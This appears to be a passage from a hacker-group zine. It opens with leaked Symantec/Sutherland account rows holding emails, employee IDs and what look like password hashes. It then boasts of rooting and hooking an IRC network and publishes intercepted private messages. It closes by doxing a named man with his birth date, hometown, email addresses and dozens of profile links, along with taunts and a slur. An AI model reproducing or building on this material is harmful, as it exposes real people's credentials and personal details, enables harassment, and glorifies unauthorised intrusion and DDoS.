1e03-4653-a88f-521baf82378e,bpr-05-07-10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,18f1b181b1ffa91c76f6520198bcfde8,Murugesan,<blank>,106473,Sivakumar,NULL,N
ULL,NULL
acfe-4722-8677-2051d5f4b696,CRQ000000298996--VMD--12/07/2011,000-000,Nagaprasann
a_N@symantec.com,Symantec,87d5c2cb4c003da1ad8be6aa5baa0f4a,N,<blank>,117447,Naga
prasanna,NULL,NULL,NULL
7ce7-4f2e-af90-a3273174367c,CRQ000000247907,<blank>,tools_id@symantec.suth.com,k
sc-04/28/2011,e0c8df96c7f108f287ba8036aa61dc29,Ferrer,<blank>,115590,WayneMichae
l,NULL,NULL,NULL
3686-4274-994a-58f8743bfef6,CRQ000000298996--vmd--12/07/2011,000-000,Rajesh_Guna
sekar@symantec.com,Symantec,6998f4f61a77c330a2cb69525bda6209,Gunasekar,<blank>,1
17449,Rajesh,NULL,NULL,NULL
fcdb-4d7d-b985-14a470ff2890,CRQ000000298996- VMD-12/07/2011,000-000,Shashidharan
_Balasub@symantec.com,Symantec,39add8346496a47db20f91bf96969de9,Balasubramanian,
<blank>,117450,Shashidharan ,NULL,NULL,NULL
fd2e-4a86-a4c7-4f92916c6f58,CRQ000000298996- VMD -12/7/2011,000-000,Srikumar_R@s
ymantec.com,Symantec,7a51c8492bc83d8cbdb5a0ad91c15390,R,<blank>,117211,Srikumar
,NULL,NULL,NULL
341e-44d6-9b84-a5faa161c697,AY 19-07-2010,INC213497,tools_id@symantec.suth.com,s
utherland,7bce0da2c2a3b6fab84f52d8cec3e70b,Soares,<blank>,074227,John,NULL,NULL,
NULL
91d3-4eb4-992a-774f2d220c4f,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,s
utherland,bd4f6d579530805adcb3e6624998a7bf,Srikumar,<blank>,074464,Abiramasundar
i,NULL,NULL,NULL
aaa9-4709-a3fe-880023aa8892,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,05f6bf984d25071699338d57e577102d,Kumar,<blank>,095800,SathishS,NULL,NULL,NULL
de8d-47d2-a441-124690b86e5a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,91e50b34b45660885df82c72f02fba2c,Martinzo,<blank>,096044,Joycelyn,NULL,NULL,NUL
L
a042-445f-97a9-abdf3fa7b712,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,4277841e698d71302ebca0aff1926837,Barcelon,<blank>,096045,Michael,NULL,NULL,NULL
83df-4f95-8ea3-15e1d0001bb4,sms 01.10,emprov,tools_id@symantec.suth.com,sutherla
nd,cc6b1abf7ebc8f85a45c6f238809d5c5,Sayed,<blank>,106468,Mustafa,NULL,NULL,NULL
430c-4381-ad57-aff4ad05fc53,bpr-07-07-10,INC207496,tools_id@symantec.suth.com,su
therland,501389e924e2a2c5dacd8edf2c2376e5,Sivanarumugam,<blank>,075896,Prem,NULL
,NULL,NULL
a61f-41ca-a01e-7cf73d07556c,CRQ000000225050-VMD-23/03/11,000-000,tools_id@symant
ec.suth.com,Sutherland,ee812598e64f9a7c6249cadc3d867e6d,Carmela,<blank>,101752,M
aria,NULL,NULL,NULL
742d-4a13-b4ff-e8d069fbea3f,bpr-07-07-10,INC207496,tools_id@symantec.suth.com,su
therland,83784c73d2120b12717f088bfd100e75,S,<blank>,075894,Magesh,NULL,NULL,NULL
221a-4286-905e-3a48e7fe5261,bpr-29-06-10,CRQ000000085915,David_Murracas@symantec
.com,Symantec,d087da6b8061f942ee2f666d4b2e8c51,Murracas,<blank>,094932,David,NUL
L,NULL,NULL
29d8-40b4-91a6-79bf358a6df3,NA 7 th April 2011,CRQ000000235043,tools_id@symantec
.suth.com,<blank>,75a449524cb1f57a7ce97f65d84973db,Rajendran,<blank>,101520,Rohi
t,NULL,NULL,NULL
cb0e-472d-81f8-3b6425805064,sms 05.10.2010,<blank>,tools_id@symantec.suth.com,Su
therland,5c72280d0612ec94a11133e60ddfb011,Allagappan,<blank>,109195,Kaarthik,NUL
L,NULL,NULL
2553-4db0-a1ed-5f85bc7e7174,CRQ000000218908 - PM - 15/3/2011,<blank>,tools_id@sy
mantec.suth.com,<blank>,26f3496e4ce3bd5c84038a28cf90e2d4,Pecolados,<blank>,11393
0,Febielene,NULL,NULL,NULL
6215-45a9-8737-64cd97b7a45b,NA 7 th April 2011,CRQ000000235043,tools_id@symantec
.suth.com,<blank>,7e1ffe3bbf0359c169cb5345bb99075e,Babu,<blank>,106086,Ramesh,NU
LL,NULL,NULL
c128-44ae-90ae-fa9cc681a646,NA 7 th April 2011,CRQ000000235043,tools_id@symantec
.suth.com,<blank>,394b9a5255f02597600a1ef3ab6c464b,Radhakrishnan,<blank>,108930,
Prabhakaran,NULL,NULL,NULL
1559-4ad1-b566-e05c2fa52801,CRQ000000285502-CLNP 22 June 2011,<blank>,tools_id@s
ymantec.suth.com,<blank>,9337e5916ced9e8545149432c1b6bae7,Parsekar,<blank>,11758
9,Sanket,NULL,NULL,NULL
4452-41fd-8b21-2b9dd183f013,09/04/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,4a9865d7aca85d46517166231e39507d,Mathew,<blank>,103105,Sinoj,NULL,NULL
,NULL
8d35-4486-8346-8fd071556cbf,CRQ000000236100-vmd-08/04/11,000-000,tools_id@symant
ec.suth.com,Sutherland,4e9feea2645fa0f8d64f53cfafd0d60d,Ba\xf1as,<blank>,114692,
Luigi Michael,NULL,NULL,NULL
e0f0-4f98-a072-de287936291f,CRQ000000236155-vmd-08/04/11,000-000,tools_id@symant
ec.suth.com,Sutherland,be542073a1cd7b418b76ac579dd86ef7,Dimla,<blank>,114785,Ron
ald,NULL,NULL,NULL
56a9-4ecd-a464-b6b8efe12af6,CRQ000000285678-CLNP 22 June 2011,<blank>,tools_id@s
ymantec.suth.com,Sutherland,080b8105575e2ff8d8e8cfaba1e2ffce,Sawant,<blank>,1175
98,Abhijit,NULL,NULL,NULL
1d9f-4e64-8070-4b40be5e2a63,SRB 27.08.2010,INC000000251664,tools_id@symantec.sut
h.com,Sutherland,c191a9c6e9d55cca20562dd00062027b,J,<blank>,086087,Ajomon,NULL,N
ULL,NULL
b0ac-470e-aa22-1aa5093e9ece,sms 12.11.10,EMPROV,tools_id@symantec.suth.com,suthe
rland,1cef9d7a15bd0c0081b53e49d7042c61,SattiNaga,<blank>,106462,Harish,NULL,NULL
,NULL
2818-4bce-b18b-057d882365c7,CRQ000000321908--VMD--17/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,4a196888e1c6ad6b19d2c047210c63eb,Padmanaban,<blank>,1
19619,Suresh,NULL,NULL,NULL
de37-40bc-bc72-96e28810bc89,bpr-07-07-10,INC207496,tools_id@symantec.suth.com,su
therland,db93a957b2609877c6387c146873a2ea,Srinivasan,<blank>,075773,Shankar,NULL
,NULL,NULL
f4e6-48c9-9e46-7b8de9c6375d,nam 07/07/2010,INC207500,tools_id@symantec.suth.comq
,Sutherland,a450b5de9f3e44fc2e4fbd1a9e8d1a8b,Tiwari,<blank>,074765,Abhishek,NULL
,NULL,NULL
4069-46f1-96dc-672928956c91,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
346914 - PR - 29th Sept 2011,ca584f823eb6b4c5551daf034ea57382,Muralidharan,<blan
k>,117059,Anoop ,NULL,NULL,NULL
dd76-40ca-86d4-97b0ea73e02f,<blank>,<blank>,accounts@symantec.teleperformance.gr
,Teleperformance,825a7ae62c8510788f5efc324beaa029,Schmidt,<blank>,109568,Kostant
in,NULL,NULL,NULL
a96d-4967-b739-6fa6e7102696,RM-29th Sept - CRQ000000346914,<blank>,tools_id@syma
ntec.suth.com,<blank>,95a8fc2749d80f83b8071fa755250ad6,Anino,<blank>,075508,Jane
Jeanette Biliran,NULL,NULL,NULL
34ad-4fbb-bb39-0bd95c8dfec9,<blank>,<blank>,tools_id@symantec.suth.com,CKS-02/11
/2010,34b1745cd89d576897dc22379dd09af7,Tembhre,<blank>,110283,Prakash,NULL,NULL,
NULL
c5f8-46e2-96fe-a95d601bfae9,CRQ000000285681-CLNP 22 June 2011,<blank>,tools_id@s
ymantec.suth.com,Sutherland,1588ef139be8452d032882da85eed680,Godinho,<blank>,117
597,Noel,NULL,NULL,NULL
274a-4f0e-9018-6493f7e802f0,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,7
4c45f4303bc7f73f81acb1476bfaea0,Linga,<blank>,075583,Jeevan,NULL,NULL,NULL
8e6e-4b0f-ad23-15eefc02642b,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,2bc1b85c0f447c360c2f5d3bc8c1335e,Srinivasan,<blank>,0755
82,Pramila,NULL,NULL,NULL
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
0x03
▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
█ ▄▄▄ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄ █ echo 'cocks'>/dev/hdd1 █▒
█ █▄█ █▄▄█ █ █ █ █ GG █▒
█▄▄▄ █▀▄ ▄▄▄█ █ █▄▄█ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█▒
▀
[PM] joepie91 -> Nijaxor : sorry, 1 sec, got a million PMs
> <MUTHA_ZERO_COOL> ZERO_COOL:
<ZERO_COOL> ?
<MUTHA_ZERO_COOL> What are you doing?
<ZERO_COOL> I'm taking over an ANON network.
<MUTHA_ZERO_COOL> Finish up, honey, and get to sleep.
# export owned=kerpia.cryto.net
# export by=HTP
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux kerpia 2.6.27 #1 SMP Mon May 9 13:27:11 CEST 2011 i686 GNU/Linux
> The Cryto IRC network was one of the networks that was hooked shortly after
we were done with AnonOps/grove. They label themselves as 'NOT AN ANON
NETWORK', but based on our observations, thats something of a running joke.
We ensured we got the bulk of PM logs by DDoSing other nodes, which greatly
frustrated joepie97 (the network administrator), who was also confused why we
couldn't take down what was potentially the weakest link.
Here are some of our favorite quotes:
[PM] inspiReMi2269 -> joepie91 : can i ask what is the best defense againse
DDOS?
[PM] inspiReMi2269 -> joepie91 : google is DDOS proof right?
[PM] joepie91 -> inspiReMi2269 : there is none
[PM] inspiReMi2269 -> joepie91 : and amazon?
[PM] inspiReMi2269 -> joepie91 : theres no way zeekill could ddos google
[PM] joepie91 -> inspiReMi2269 : currently, no
[PM] joepie91 -> inspiReMi2269 : if he wanted to and had some time, yes
[PM] Anony_Ops -> joepie91 : yeah :\ Turks again?
[PM] joepie91 -> Anony_Ops : no
[PM] joepie91 -> Anony_Ops : zeekill
[PM] joepie91 -> Anony_Ops : and hacktheplanet as extra bonus
[PM] joepie91 -> Anony_Ops : one leaf caught 50gbps <-Wait til you see our TBit
[PM] Anony_Ops -> joepie91 : hm... have not heard of him. ;)
[PM] Anony_Ops -> joepie91 : wow. Ouch
[PM] joepie91 -> Anony_Ops : hacktheplanet is the group of people that also
fucked up anonops a few times
[PM] Anony_Ops -> joepie91 : Oh I see
[PM] Anony_Ops -> joepie91 : skids? or legit?
[PM] joepie91 -> Anony_Ops : legit skills, acting like skids
[PM] sh4ri4 -> joepie91 : well if some cat comes along with a botnet that is
fine - but I do not work that way
[PM] sh4ri4 -> joepie91 : get nachash
[PM] sh4ri4 -> joepie91 : did u read my doxing?
[PM] sh4ri4 -> joepie91 : that was all posted by nachash
[PM] sh4ri4 -> joepie91 : he is the problem
[PM] joepie91 -> sh4ri4 : hmm
[PM] sh4ri4 -> joepie91 : but I came back
[PM] sh4ri4 -> joepie91 : cuz I din't have to hide
[PM] sh4ri4 -> joepie91 : best I can suggest is track him down
[PM] sh4ri4 -> joepie91 : me, idc
[PM] sh4ri4 -> joepie91 : This is my philosophy - with iranserv:
[PM] sh4ri4 -> joepie91 : <The_poet> ok this is geting more and more strange..
.
[PM] sh4ri4 -> joepie91 : <sh4ri4> not strange at all
[PM] sh4ri4 -> joepie91 : <sh4ri4> you are in Iran now
[PM] sh4ri4 -> joepie91 : <sh4ri4> they want to chat with us
[PM] sh4ri4 -> joepie91 : <sh4ri4> so chat
[PM] sh4ri4 -> joepie91 : <sh4ri4> spend all ur time here
[PM] sh4ri4 -> joepie91 : Nachash could have got ppl killed by doxing me and I
suspect he is up to the same shit again with #opjapan
[PM] sh4ri4 -> joepie91 : he did not even dox me. THAT is the BIG JOKE
[PM] joepie91 -> sh4ri4 : :|
[PM] Nijaxor -> joepie91 : <Nijaxor> only stupid people can get their shit
tapped
[PM] Nijaxor -> joepie91 : <Nijaxor> hooks and such
[PM] joepie91 -> xnite : does he also use 'chippy'?
[PM] xnite -> joepie91 : no
[PM] joepie91 -> xnite : ok
[PM] xnite -> joepie91 : chippy is a totally diff person
[PM] xnite -> joepie91 : chippy is pretty cool <-Agreed as fuck.
[PM] joepie91 -> xnite : ok :P
[PM] xnite -> joepie91 : from what i can tell
[PM] xnite -> joepie91 : so okay
[PM] xnite -> joepie91 : now i need to follow this ugnazi stuff
[PM] xnite -> joepie91 : whois ugnazi?
[PM] joepie91 -> xnite : 1 sec
[PM] joepie91 -> xnite : pure.consternation.us
[PM] joepie91 -> xnite : he connected from there
[PM] joepie91 -> xnite : to an IRC net?
[PM] xnite -> joepie91 : from what i understand its a group of "hackers" and
th3j35t3r has been after them
[PM] xnite -> joepie91 : joepie91 yea its his efnet connection from my old logs
[PM] joepie91 -> xnite : ugnazi is a group of skids
[PM] joepie91 -> xnite : right
[PM] xnite -> joepie91 : chippy is pretty cool
Towards the end of this dump, we just stopped taking backups and left tail -f
running. joepie97 found the hook, just a little too late (a million PMs in
the PM log alone). He then ran: "echo 'cocks' > ._IRCD". Interestingly,
neither Stanford, nor Gentoo developers, nor the EFF list "echo 'cocks'>file"
as a secure deletion method. As such, we proceeded to take the latest copy
directly off the HDD (sed cocks). Check out the Files section for the
chanlogs & PM logs.
[See 0x07: Files for PM/Channel logs]
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
████▓▓▓▓▓█████████████████████████▓▓▓▓▓▓▓███████████████████████████████████████
███▓▓▓▓████████████████████████▀█▓▓▓▓▓▓▓████████████████████████████████████████
██▓▓▓▓▓████████████████████████ █▓▓▓▓▓▓█████████████████████████████████████████
█▓▓▓▓▓██████████████████████▒█ █▓▓▓▓▓▓██████████████████████████████████████████
█▓▓▓▓█████████████████████▒▒█ █▓▓▓▓▓█████████████████████████▓▓████████████████
▓▓▓▓█████████████████████▒▒█ █▓▓▓▓▓█████████████████████████▓▓▓████████████████
▓▓▓▓███████████████████▒▒▒█ █▓▓▓▓▓████████████████████████▓▓▓▓████████████████
▓▓▓███████████████████▒▒▒█ █▓▓▓▓▓███████████████████████ █▓▓▓▓████████████████
▓▓▓█████████████████▒▒▒▒█ █▓▓▓▓██████████████████████▒▒ █▓▓▓▓████████████████
▓▓▓████████████████▒▒▒▒█ █▓▓▓▓█████████████████████▒▒▒ █▓▓▓▓████████████████
▓▓███████████████▒▒▒▒▒ █ █▓▓▓▓███████████████████▒▒▒▒ ▓▓▓▓████████████████
▓▓██████████████▒▒▒▒▒ █ █▓▓▓▓███████████████████▒▒▒▒ ▓▓▓▓████████████████
▓▓████████████▒▒▒▒▒▒ █ █▓▓▓██████████████████▒▒▒▒ █▓▓▓▓████████████████
▓▓███████████▒▒▒▒▒▒ █ █▓▓▓▓████████████████▒▒▒▒▒ █▓▓▓▓████████▓███████
▓▓██████████▒▒▒▒▒▒ █ █▓▓▓▓██████████████▒▒▒▒▒ ▓▓▓▓█████▒█▓▓████████
▓▓█████████▒▒▒▒▒▒ █ █▓▓▓█████████████▒▒▒▒▒▒ █▓▓▓█████▒▒▓▓▓████████
▓▓████████▒▒▒▒▒▒ █ ▄█▓▓▓███████████▒▒▒▒▒▒ ▓▓▓████▒▒▒█▓▓████████▒
▓▓███████▒▒▒▒▒▒▒ █ █▓▓▓██████████▒▒▒▒▒▒ █▓▓███▒▒▒▒▒▓▓█████████▒
▓▓██████▒▒▒▒▒▒▒ ▀ █▓▓▓█████████▒▒▒▒▒ █▓████▒▒▒▒▒█▓███████▓██▒
▓▓█████▒▒▒▒▒▒▒▒ █▓▓▓███████▒▒▒▒▒▒ █▓█████▒▓▒▒▒▓▓██████▒▒▒▒█
▓▓█████▒▒▒▒▒▒▒ █▓▓███████▒▒▒▒▒ ██▓██████▒▒▒▒█▓██████▒▒ ▒
█▓████▒▒▒▒▒▒▒▒ █▓▓█████▒▒▒▒▒▒ █████████████▒▒█▓████▒█▒▒ █
█▓█████▒▒▒▒▒▒ █▓▓████▒▒▒▒▒ ███████████████▒▒██▒▒▒▒█▒█ █
█▓███████▒▒▒▒ █▓████▒▒▒▒▒ ███████████░█▓███▄▒▒▒▒▒█▒▒
░██████████▒ █▓███▒▒▒▒▒ █████████░░░░░░█▓▓▓▒▒▒▒▒▒▒█▄
██░░███████ █▓██▒▒▒▒▒ ▄████████░░░░░░░░░█▓▓▒▒▒▒▒▒█▒▒▒█ █
██ ░░██████ ███ ▒▒▒ ████████░░░ ░░░░░█▓▒▒▒▒▒▒▒▒▒▒▒█ █
▀ █████████ ██ ▒ █████████░ ░░░█▒▒▒▒▒▒▒▒█▒▒▒▒▒ ██
█▀█████████ █ ███████████ ░░░▒█▒▒▒▒▒▒▒▒▒▒▒▒▒█ ██
▀█▄███▀ ░░███ █ ▓ █ █████░█▄▀████ ░░░█▒▒▒▒▒▒▒▒█▒▒▒▒▒ ███
░░█▄█ ▓ █████░░░ ▀███ ░░░█▒▒▒▒▒▒▒▒▒▒▀█▒▒ ████
▒ ▄ ▓ █ ░░░░█▒▒▒▒▒▒▒▒█▒ ▒ ████
█ ▀█▀▀▀ █ ░░░░█▒▒▒▒▒▒▒▒▒█▒▒▒▒▒█ ▒█████
▀▀▀▄▄▄▄▄▄▄▄▄▄▄ █ █ ▄▄▄▄▄▄▄▓▓▓▓▓█▒▒▒▒▒▒▒▒█ ▒▒███████
░░░░ ▀▀▀ ▀▀▀▀▀▀▀ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒████████
░░░ ░░░▒▒▒▒▒▒▒▄▄█ ▒▒▒▒█▒▒▒▓█▓▓▓▒▒▒░▒▒▒▒▒▒▒▒█▒▒▒▒▒█▀▀▀▀
░ ░░ █▄▒▒▒░░░░░░░░ ▒▒▒▒▒▒▒▒▒▒█▀░░ ░
░░░░░░░░░ ▒▒▒▒▒█ ░░░ ░
░░ █ ░░░░░░ ▒▒▒▒▒▒░░ ░
░ █ ░░░ ▒▒▒▒█▒░ ░░ ░
░ ▄█ ▒ ░ ▒▒▒▒▒▒░░ ░ ░
░ ░█ ▒ ▒▒▒▒█▒▒▒░ ░ ░
░ ░░█ ▒▒ ▒▒▒▒█▒▒▒█░ ░ ░
░ ░░░█ ▒▒▒▒ ▒▒▒▒█▒▒▒▒█░ ░ ▓
░░ ▀░░█ ▒▒█ ▒█ ▒▒▒▒█▒▒▒▒▒█░░ ░ ▓
░░░ ▀▀█ ▒▀ ▒ ▒▒▒▒█▒▒▒▒▒▒█░█ ░ ░ ░█
░░░░ ▀▄▄▄▀ ▒▒▒▒█▒▒▒▒▒▒▒█░█░ ░ ░▓
░░░░░ ▒▒▒▒█▒▒▒ ▒▒▒▒▓░█ ░░ ▓ ░ ░▓
█░░░░░ ▄▀▀▀▀▀▀▀▀▀▀▀▀▄ ▒▒▒▒▒▒▒▒ ▒▒▒▓░▓ ▓ ░ ▓ ░ █
█░░░░ ░ ▒▒▒▒█▒▒ ▒▒▒▓█▓▀ ▓ ░ █ ▓ ▓
▒█░░░ ▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒█▒▒▒ ▒▒▒▓█▓ ▓ ▓▓▓ █ █░▓
▒█░░░ ▒▒▒█▒▒▒▒ ▒▒▓ █▓ ▓▓▓ ▓ ▓ ▓ ▓
▒█░░ ▒▒▒█▒▒▒▒▒ ▒▒▓▒ ██▓▓ ▓░▓░▓ █
▒▒█░░ ░▒█▒▒▒▒▒▓ ▒▒█▒▒ ▀█ ▓ ▓░▓ █
▀ ▒▒█░░ ░░█▓▒▒▒▒▒▓ ▒▒█▒▒▒▒ ▀█ ▓ █ ▓
█ ▒▒▒░░ ░░█▒▒▒▒▒▒█ ▒▒█▒▒▒▒▒▒ ▀█ ▓░▓
▄ ▒▒█░░ ░░█▓▒▒▒▒▒▒█ ░ ▒▒▓▓▓▒▒▒▒▒ ▀█░▓
▒▒█░ ░█▓▓▒▒▒▒▒▒█ ░ ▒▒▓▓▓▓▒▒▒▒▒ █▄
▒▒▒█░ ░█▓▓▓▒▒▒▒▒▒▓ ░ ▒█▓▓▓▓▓▓▒▒▒▒▒
▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▓░ ░ ▒▒▒▒██▓▓▓▒▒▒▒▒
█ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒░ ▒▒▒▒▒▒█▓▓▓▒▒▒▒▒
█ ▒ ░░ ▒▒▒▒░ ▒ ▒▒▒███▓▒▒▒▒
█ ▒ ▒▒▒▒░░ █▒ ░ ▒██▓▒▒▒▒
▒█ ▒▒▒░░ ▓▒ ░ ██▒▒▒▒
▒ ▒ ▒▒▒░░ ▒▒▒ ░ ▒▓▒▒▒
█ ▒ ▒▒▒░░░ █▒▒ ░ █▒▒
▒▓░ █ ▒▒░░░ █▒▒ ░ ▒
▒░░ █ ▒▒█░░ ▓▓▒▒ ░
░ ▒▓░░ █ ▒▒█░░░ ▓█▒▒▒ ░
▒▒█░░ ▄ ▒▒█░░░ ▓▓▒▒▒ ▓
░ ▒▓░░░ ▒█░░░░ █▓▒▒▒▒ ░ ░ ░▓
▒▓█░░░ █ ▒█░░░░ █▓▓▒▒▒▒ █░
░ ▒▒▓░░░░ █ ▒█░░░░░ ▓▓▓▒▒▒▒ ░ █
▒▒▓█░░░░ █ ▒█░░░░░ ▓▓▓▒▒▒▒ ▓
▒▒▓▓░░░░░ █ ▒░░░░░░ █▓▓▓▒▒▒▒▒ ░
▒▒▓█░░░░░░ ▒ ▒▒░░░░░░░ █▓▓▓▒▒▒▒▒
░ ▒▓▓██░░░░░ ▒▒▒▒█░░░░░░ █▓▓▓▓▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
0x04
▄▄▄▄
█ █ ▄ ▄ ▄ ▄ ▄▄▄▄ ▄▄▄ █ ▄ ▄ ▄ ▄▄▄▄ █ █ ▄▄▄▄
█▀▀▀ █ █ █ █▀▄█ █▄▄ █ █ █ █ █▀▄█ █▄▄ █ █ █▄▄█
█ ▀▄█▄▀ █ █ █▄▄▄ █▄▄▀ █▄▄ █ █ █ █▄▄▄ █▄▄█ █
<joey> i need a handle, man. I don't have an identity until I have a handle
<phreak> You know, you're right about that.
<joey> Alright. How about the Master of Disaster, huh?
<phreak> You're hopeless, man, utterly hopeless.
Le Researcher
Magazine interview, several years ago:
"""
People from the Internet with the lifestyle "Nothing to Hide" are the worst
kind of people.
They even call themselves Hackers.
Everybody can say: "I don't have something to hide" after they are registered
somewhere in the internet.
"I get you" says Retrace. He is a People Hacker or a social engineer.
He gets his Nick/Handle from an American, he found everything about him from
the Internet.
His real name he does not want to say. It is a Hobby, it has nothing to do with
his work.
He opens his laptop and goes after an address, to show his skills.
For a person who has nothing to hide, the linking from one person to another is
very easy.
If you get a nick/handle/alias for an e-mail address, it's easy to track your
online shopping or visit of a dating page.
Today this is a very easy task for a Hacker. Everything is connected to the
internet. Privacy? What an illusion.
Retrace, as a People Hacker, is not limited to technology. He tricks
information out of people, truth talking.
You would be surprised how much information people would give away to a
stranger.
"""
Name: Nick Koenderink
DOB: 08/16/1984
Hometown: Enschede, Netherlands
E-mail:
retrace@tkkrlab.nl
koenderink@gmail.com
kornelis84@gmail.com
twitleres@gmail.com
MSN: Kornelis@microsoft.nl
Skype: Le_Researcher, kornelis84
http://tkkrlab.nl/wiki/User:Retrace // We especially loved the "SSID Dating"
page he created.
Since we're on the subject of wikis, let's compare retrace's ProxyChecker code (
Found here: http://tkkrlab.nl/wiki/TkkrLab:Proxychecker) to ScrapeMyAss (Found
here: https://github.com/leresearcher/Scrape-My-Ass-/blob/master/scrapmyass.py)
Did you shit your pants? So did we. Wanna know the magic google dork 0day we
used to help tie it all together?
request.addheaders= [('User-agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.2; en) Opera 9.50")]
In other words, double flawless victory in the secret bonus round:
https://www.youtube.com/watch?v=QGm0yJBRm8E
Also, check out these two paste links:
http://pastebin.com/p46RJTLB // Shows "retrace" on 2600 in 2010, ircing from
retrace.nl.
http://www.pastie.org/2746792/wrap // and this shows retrace in #jester
Profiles:
http://0x72657472616365.blogspot.co.uk/
http://favstar.fm/users/koenderink
https://secure.flickr.com/people/0x52/
http://www.gamed.nl/profile/532
https://plus.google.com/113982852221989261798/about
http://www.jaggle.nl/forums/member/158/
http://www.metacafe.com/channels/0x72657472616365/
http://home.planet.nl/~sever018/members.htm
http://us.playstation.com/publictrophy/index.htm?onlinename=kornelis
http://raptr.com/Vlek/about?_noscript=1
http://steamcommunity.com/id/nodiz
http://thewhuffiebank.org/koenderink
http://topsy.com/twitter/koenderink
http://twicsy.com/u/koenderink
https://twitpic.com/photos/korneelis
https://twitpic.com/photos/Vlek
https://twitter.com/Korneelis
https://twitter.com/Le_Researcher
https://twitter.com/koenderink
https://twitter.com/vlek
https://www.youtube.com/user/Kornelis/feed?gl=NG&hl=en-GB
https://leresearcher.wordpress.com/
https://live.xbox.com/en-US/Profile?GamerTag=kornelis
---------------------------------------------
Domain retrace.nl
Status active
Holder N. Brands
Administrative contact admin@yourhosting.nl
Registrar Realtime Register
Ceintuurbaan 32a
8024AA ZWOLLE
Netherlands
Technical contacts tech@yourhosting.nl
DNSSEC no
Domain Name Servers ns3.firstfind.nl
ns4.firstfind.nl
Registration Date 05/24/2010
Administration by NL Domain Registry
-----------------------
more profiles of him (found through http://www.yasni.com/koenderink/free+people+
search) google Nick Koenderink Windows Expert Blogger and wallah
http://elfsteden.holland.com/user/splasynl
http://www.mobypicture.com/user/splasynl/view/5582380 (someone's getting some
prank calls)
alright so we got another username, splasynl? STOP! scrape time!
possible https://www.youtube.com/user/Splasynl
possible http://qik.com/splasynl
let's look for more on Kornelis
google "kornelis" Nick Koendernik
http://www.gamingonly.nl/forum/showthread.php?67-Naar-welk-liedje-luister-jij-op
-dit-moment/page70
so he makes music? wat.
http://www.gamingonly.nl/forum/search.php?searchid=478086
(for someone who can translate in NL)
Proof he plays WoW
https://twitter.com/Le_Researcher/status/80263912792141825
Him and Jester are good friends
https://twitter.com/Le_Researcher/status/82117579115741184
https://twitter.com/Le_Researcher/status/87199519435005953
Wow rofl, faildox
https://twitter.com/Le_Researcher/status/83095896811769856
Apparently he doesn't like Mitnick either
https://twitter.com/Le_Researcher/status/83162290769240064
Yeah..........no
https://twitter.com/Le_Researcher/status/83529442793754624
Irony
https://twitter.com/Le_Researcher/status/84398517401034752
He is just not good at this doxing thing
https://twitter.com/Le_Researcher/status/84630481689247745
https://twitter.com/Le_Researcher/status/84632123054628864
https://twitter.com/Le_Researcher/status/84701852985327616
https://twitter.com/Le_Researcher/status/84948179317035008
Y U GOTTA LIE BREH
https://twitter.com/Le_Researcher/status/85387893253746689
Promoting OWASP
https://twitter.com/Le_Researcher/status/85469902122651648
More irony
https://twitter.com/Le_Researcher/status/85682883251023872
Says the Mac user?
https://twitter.com/Le_Researcher/status/92350046548402176
Yes you are
https://twitter.com/Le_Researcher/status/93069088884142081
Come again....PLEASE
https://twitter.com/Le_Researcher/status/96849987459235840
CCC? Wat
https://twitter.com/Le_Researcher/status/102033787327754240
Wat 2
https://twitter.com/Le_Researcher/status/113927303716802561
Moar irony
https://twitter.com/Le_Researcher/status/140266563096944640
CCC again
https://twitter.com/Le_Researcher/status/152910618255564800
We know ;)
https://twitter.com/Le_Researcher/status/164436199476441088
Faggot
https://twitter.com/Le_Researcher/status/171076183851667457
For when we get his mom's name
https://twitter.com/Le_Researcher/status/172688868607410176
Yawn
https://twitter.com/Le_Researcher/status/175543434797514752
Interesting he'd RT this OWASP
https://twitter.com/owasp/status/175731201468932097
And RT of Tkkrlab
https://twitter.com/Recklessnutter/status/179583642421571586
Funny he RT's this....he'll be on it soon
https://twitter.com/doxbin/status/182969961352925184
Faildox is his thing
https://twitter.com/brusselmans/status/185363624250982400
More about hackerspaces
https://twitter.com/Le_Researcher/status/186046471471235072
I'm not sure of him or th3j35t3r are worse at dox
https://twitter.com/Le_Researcher/status/188624990508294146
Yawn 2
https://twitter.com/Le_Researcher/status/189795681404334080
nope.jpg
https://twitter.com/Le_Researcher/status/191616389902106624
Proof someone likes writing in Hex (sup Retrace)
https://twitter.com/Le_Researcher/status/191826672180412416
